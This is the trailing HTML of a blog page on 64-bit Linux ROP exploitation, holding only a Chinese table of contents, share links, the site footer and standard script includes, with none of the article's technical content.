      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-32%E4%BD%8D%E4%BA%8E64%E4%BD%8D%E7%9A%84%E5%8C%BA%E5%88%AB"><span class="toc-number">2.</span> <span class="toc-text">0x01 32位于64位的区别</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E9%80%9A%E7%94%A8%E7%9A%84gadget"><span class="toc-number">3.</span> <span class="toc-text">0x02 通用的gadget</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text">0x03 漏洞利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E6%80%BB%E7%BB%93"><span class="toc-number">5.</span> <span class="toc-text">0x04 总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E8%B8%A9%E8%BF%87%E7%9A%84%E5%9D%91"><span class="toc-number">6.</span> <span class="toc-text">0x05 踩过的坑</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/04/03/linux64-rop-exp/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/04/03/linux64-rop-exp/&text=[pwn] linux_64 ROP exploit"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/04/03/linux64-rop-exp/&is_video=false&description=[pwn] linux_64 ROP exploit"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[pwn] linux_64 ROP exploit&body=Check out this article: http://example.com/2018/04/03/linux64-rop-exp/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/04/03/linux64-rop-exp/&title=[pwn] linux_64 ROP exploit"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/04/03/linux64-rop-exp/&name=[pwn] linux_64 ROP exploit&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/04/03/linux64-rop-exp/&t=[pwn] linux_64 ROP exploit"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2017-2022
    PENCH3R
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/category/">Category</a></li><!--
     --><!--
       --><li><a href="/tag/">Tag</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 



  <script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js" crossorigin="anonymous"></script>
  
<script src="/js/wrapImage.js"></script>





<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


</body>
</html>
